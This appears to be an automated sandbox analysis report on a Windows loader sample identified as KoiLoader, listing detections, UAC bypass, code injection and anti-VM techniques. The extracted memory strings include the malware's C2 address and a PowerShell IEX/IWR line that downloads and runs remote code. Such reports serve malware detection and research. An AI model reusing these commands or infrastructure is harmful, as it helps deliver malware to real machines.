Windows Analysis Report
SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe

Overview

General Information

Sample name: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe
Analysis ID: 1541791
MD5: 9e70e823876c7e83bf254d1f8fcbb3e5
SHA1: dba226d7c283e53478e3f0b02b1ec8a8260dea57
SHA256: fe75dacf62cfc6a628f60b49a8c670c55d3ab06ec825ea7d35b132bc8951626e
Tags: exe
Infos:

Detection

KoiLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Contains functionality to bypass UAC (CMSTPLUA)
Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected KoiLoader
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contain functionality to detect virtual machines
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Found evasive API chain (may stop execution after checking mutex)
Machine Learning detection for sample
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Program does not show much activity (idle)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Avira: detected
Found malware configuration
Source: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp Malware Configuration Extractor: KoiLoader {"C2": "http://217.195.153.196/academy.php", "Payload url": "http://217.195.153.196/assets"}
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Virustotal: Detection: 78% Perma Link
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe ReversingLabs: Detection: 79%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Code function: 0_2_010992B0 CryptGenRandom,HeapFree,GetProcessHeap,HeapFree,wsprintfA,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 0_2_010992B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Code function: 0_2_010986B4 InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW, 0_2_010986B4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Code function: 0_2_010986D0 InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW,ExitProcess, 0_2_010986D0

Exploits
barindex
Yara detected UAC Bypass using CMSTP
Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1241c70.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1090000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1241c70.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1809713648.000000000121E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe PID: 7376, type: MEMORYSTR

Privilege Escalation
barindex
Contains functionality to bypass UAC (CMSTPLUA)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Code function: 0_2_010972C0 ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,lstrlenW,ExpandEnvironmentStringsW,GetSystemWow64DirectoryW,GetLastError,wnsprintfW,wnsprintfW,ExpandEnvironmentStringsW,wnsprintfW,SetFileAttributesW,lstrcpyW,GetUserNameW,NetUserGetInfo,NetApiBufferFree,CoInitializeEx,lstrlenW,wsprintfW,CoGetObject,CoUninitialize, 0_2_010972C0

Compliance
barindex
Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Unpacked PE file: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1090000.1.unpack
Uses 32bit PE files
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Code function: 0_2_0015993E FindFirstFileExW,FindNextFileW,FindClose,FindClose, 0_2_0015993E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Code function: 0_2_010989B0 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,GetModuleFileNameW,StrStrIW, 0_2_010989B0

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://217.195.153.196/academy.php
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Code function: 0_2_01097550 inet_pton,htons,socket,GetProcessHeap,connect,recv,GetProcessHeap,HeapAlloc,CreateThread,CloseHandle,GetProcessHeap,recv,closesocket,GetProcessHeap,HeapFree,GetProcessHeap,GetProcessHeap,HeapFree, 0_2_01097550
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe String found in binary or memory: http://217.195.153.196/academy.php
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe, 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe, 00000000.00000002.1809713648.000000000121E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://217.195.153.196/academy.php%temp%
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe String found in binary or memory: http://217.195.153.196/assets
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe, 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe, 00000000.00000002.1809713648.000000000121E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://217.195.153.196/assets/c

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1090000.1.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1241c70.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Contains functionality to call native functions
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Code function: 0_2_01095C50 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle, 0_2_01095C50
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Code function: 0_2_01095FB0 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTempPathW,wnsprintfW,wnsprintfW,PathCombineW,CreateFileW,WriteFile,WriteFile,SetEndOfFile,SetFilePointer,wnsprintfW,RtlInitUnicodeString,RtlInitUnicodeString,RtlInitUnicodeString,GetCurrentProcess,SetFilePointer,WriteFile,FlushFileBuffers,SetEndOfFile,NtQueryInformationProcess,NtClose,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,NtClose,NtClose,NtClose,NtClose,CloseHandle, 0_2_01095FB0
Detected potential crypto function
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Code function: 0_2_0015FBC1 0_2_0015FBC1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Code function: 0_2_010989B0 0_2_010989B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Code function: 0_2_010943B0 0_2_010943B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Code function: 0_2_010947B0 0_2_010947B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Code function: 0_2_01097BF0 0_2_01097BF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Code function: 0_2_01092690 0_2_01092690
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Code function: 0_2_010976F0 0_2_010976F0
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Code function: String function: 001550E0 appears 33 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Code function: String function: 00153CE0 appears 82 times
Uses 32bit PE files
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1090000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1241c70.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: classification engine Classification label: mal100.troj.expl.evad.winEXE@1/0@0/0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Code function: 0_2_01096350 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle, 0_2_01096350
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Code function: 0_2_01096D30 wnsprintfW,ExpandEnvironmentStringsW,VariantInit,CoCreateInstance,SysAllocString,SysAllocString,SysFreeString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,VariantInit,SysAllocString,SysAllocString,SysFreeString,VariantClear, 0_2_01096D30
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Virustotal: Detection: 78%
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe ReversingLabs: Detection: 79%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Section loaded: uxtheme.dll Jump to behavior
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation
barindex
Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Unpacked PE file: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1090000.1.unpack
Yara detected KoiLoader
Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1241c70.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1090000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1241c70.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1809713648.000000000121E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe PID: 7376, type: MEMORYSTR
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Code function: 0_2_00151300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect, 0_2_00151300
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Code function: 0_2_001602D1 push ecx; ret 0_2_001602E4

Malware Analysis System Evasion
barindex
Contain functionality to detect virtual machines
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Code function: %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxTray.exe 0_2_010989B0
Contains functionality to compare user and computer (likely to detect sandboxes)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Code function: EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,GetModuleFileNameW,StrStrIW, 0_2_010989B0
Found evasive API chain (may stop execution after checking mutex)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe File opened / queried: C:\Windows\System32\VBoxService.exe Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe API coverage: 9.5 %
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Code function: 0_2_0015993E FindFirstFileExW,FindNextFileW,FindClose,FindClose, 0_2_0015993E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Code function: 0_2_010989B0 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,GetModuleFileNameW,StrStrIW, 0_2_010989B0
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Binary or memory string: Hyper-V
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe, 00000000.00000002.1809713648.000000000121E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: POST%s|%s|4jdmhuQIStart%d|%sINITWindowsPowerShell\v1.0\powershell.exe -enc %S /c %Skernel32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirectionShellExecuteWshell32openReleaseSeShutdownPrivilege%Shttp://217.195.153.196/academy.php%temp%\%paths%%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exesd2.ps1sd4.ps1http://217.195.153.196/assets/c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')"Hyper-VParallels Display AdapterRed Hat QXL controller%systemroot%\System32\VBoxService.exe%systemroot%\System32\VBoxTray.exe?
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Binary or memory string: %systemroot%\System32\VBoxService.exe
Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Binary or memory string: %systemroot%\System32\VBoxTray.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe API call chain: ExitProcess graph end node
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Code function: 0_2_00154E89 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00154E89
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Code function: 0_2_00151300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect, 0_2_00151300
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Code function: 0_2_00151710 mov ecx, dword ptr fs:[00000030h] 0_2_00151710
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Code function: 0_2_01097900 mov eax, dword ptr fs:[00000030h] 0_2_01097900
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Code function: 0_2_01095FB0 mov eax, dword ptr fs:[00000030h] 0_2_01095FB0
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Code function: 0_2_0015B779 GetProcessHeap, 0_2_0015B779
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Code function: 0_2_00155016 SetUnhandledExceptionFilter, 0_2_00155016
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Code function: 0_2_001549BE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_001549BE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Code function: 0_2_00154E89 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00154E89
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Code function: 0_2_001576CB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_001576CB

HIPS / PFW / Operating System Protection Evasion
barindex
Contains functionality to inject code into remote processes
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Code function: 0_2_01095C50 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle, 0_2_01095C50
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Code function: ExpandEnvironmentStringsW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetCurrentProcessId,OpenProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,GetWindowsDirectoryW,StrNCatW,VirtualAlloc,lstrcpyW,GetModuleFileNameW,ReadProcessMemory,ReadProcessMemory,CloseHandle,StrCmpIW, \explorer.exe 0_2_010993B0
